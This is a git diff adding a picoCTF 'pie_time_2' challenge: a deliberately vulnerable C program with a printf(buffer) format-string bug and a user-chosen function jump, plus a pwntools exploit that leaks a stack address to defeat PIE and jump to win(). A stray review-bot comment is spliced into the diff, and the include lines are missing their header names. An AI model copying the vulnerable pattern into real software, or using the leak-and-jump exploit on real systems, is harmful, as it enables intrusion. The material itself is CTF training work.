diff --git a/pwn/pie_time_2/flag.txt b/pwn/pie_time_2/flag.txt
new file mode 100644
index 0000000..7f34d3c
--- /dev/null
+++ b/pwn/pie_time_2/flag.txt
@@ -0,0 +1 @@
+picoCTF{dummy}
diff --git a/pwn/pie_time_2/solve.py b/pwn/pie_time_2/solve.py
new file mode 100755
index 0000000..df03cd2
--- /dev/null
+++ b/pwn/pie_time_2/solve.py
@@ -0,0 +1,44 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
+
+from pwn import *
+
+exe = ELF("./vuln")
+
+context.binary = exe
+
+ADDR, PORT, *_ = "rescued-float.picoctf.net 54718".split()
+
+def conn() -> remote:
+ if args.REMOTE:
+ r = remote(ADDR, PORT)
+ else:
+ r = process([exe.path])
+
+ return r
+
+def main():
+ r = conn()
+
+ # gdb.attach(r, gdbscript='''
+ # info proc mappings
+ # c
+ # ''')
+
+ # Calculated by inspecting the output - the reported binary start address from gdb
+ leak_offset = 0x1441
+
+ r.recvuntil(b'Enter your name:').decode()
+ r.sendline(b'%p\t'*20)
+ leaks = r.recvline().strip().decode().split('\t')
+ base_leak = leaks[18]
+ exe.address = int(base_leak[2:], 16) - leak_offset
+ print(f"Base address: {hex(exe.address)}, jump to win: {hex(exe.symbols['win'])}")
+
+ print(r.recvuntil(b' enter the address to jump to, ex => 0x12345: ').decode())
+ r.sendline(hex(exe.symbols['win']))
+ print(r.recvall().decode())
+ r.close()
+
+if __name__ == "__main__":
+ main()
diff --git a/pwn/pie_time_2/vuln b/pwn/pie_time_2/vuln
new file mode 100755
index 0000000..058a207
Binary files /dev/null and b/pwn/pie_time_2/vuln differ
diff --git a/pwn/pie_time_2/vuln.c b/pwn/pie_time_2/vuln.c
new file mode 100644
index 0000000..51b81dd
--- /dev/null
+++ b/pwn/pie_time_2/vuln.c
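Review bot: The leak parsing at `base_leak = leaks[18]` / `exe.address = int(base_leak[2:], 16) - leak_offset` never validates what came back: if the 19th `%p` prints `(nil)` the `int()` raises an opaque ValueError, and if the stack layout differs from the one inspected under gdb (other libc, environment or remote kernel) the script silently computes a wrong base and sends a garbage address to the target. A one-line sanity check after the subtraction catches both, since a PIE base must be page-aligned: `if not base_leak.startswith("0x") or exe.address & 0xfff: raise ValueError(f"unexpected leak {base_leak!r} -> base {exe.address:#x}")`. The comment above `leak_offset = 0x1441` would read better if it named what the value is, e.g. `# in-binary offset of the value sitting in %p slot 18 (presumably a return address); measured once under gdb with 'info proc mappings'`. The `.decode()` on `r.recvuntil(b'Enter your name:')` is a no-op whose result is discarded and can be dropped.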
@@ -0,0 +1,56 @@
+#include
+#include
+#include
+#include
+
+void segfault_handler() {
+ printf("Segfault Occurred, incorrect address.\n");
+ exit(0);
+}
+
+void call_functions() {
+ char buffer[64];
+ printf("Enter your name:");
+ fgets(buffer, 64, stdin);
+ printf(buffer);
+
+ unsigned long val;
+ printf(" enter the address to jump to, ex => 0x12345: ");
+ scanf("%lx", &val);
+
+ void (*foo)(void) = (void (*)())val;
+ foo();
+}
+
+int win() {
+ FILE *fptr;
+ char c;
+
+ printf("You won!\n");
+ // Open file
+ fptr = fopen("flag.txt", "r");
+ if (fptr == NULL)
+ {
+ printf("Cannot open file.\n");
+ exit(0);
+ }
+
+ // Read contents from file
+ c = fgetc(fptr);
+ while (c != EOF)
+ {
+ printf ("%c", c);
+ c = fgetc(fptr);
+ }
+
+ printf("\n");
+ fclose(fptr);
+}
+
+int main() {
+ signal(SIGSEGV, segfault_handler);
+ setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered
+
+ call_functions();
+ return 0;
+}
\ No newline at end of file